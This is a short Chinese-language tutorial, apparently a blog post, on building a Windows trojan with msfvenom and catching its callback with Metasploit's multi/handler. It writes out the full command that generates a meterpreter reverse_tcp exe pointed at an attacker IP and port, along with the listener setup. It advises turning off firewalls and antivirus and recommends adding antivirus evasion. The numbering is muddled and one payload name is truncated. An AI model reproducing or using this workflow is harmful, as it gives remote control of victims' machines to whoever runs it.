一.实验过程
1.查看木马种类:msfvenom -l payloads
1.生成exe木马:
(注:lhost,lport要填填自己攻击机IP的IP和端口)
msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.171.137 lport=45678 -f exe >/var/www/html/龙.exe
木马文件在目录:/var/www/html
(注:如需要在虚拟机里实验,则需要借助实体机才能复制,并且实体机,虚拟机的防火墙,杀毒软件都得关闭)(注:使用实体机实验也是可以的(作者就是))
3.进入msfvenom:msfvenom
1.启用监听:use exploit/multi/handler
2.设置exe木马:set payload windows/meterpreter/reverse_t
3.填信息:show options
4.msf6 exploit(multi/handler) > set lhost “这里是自己的ip,不用查了,把他复制下来,如图下所示” lhost =>填自己攻击机IP
msf6 exploit(multi/handler) > set lport 端口也一样,如上图所示
lport => 填自己攻击机端口
本文要使用到kali linux系统,kali 官网下载:Get Kali | Kali Linux
加上免杀就very good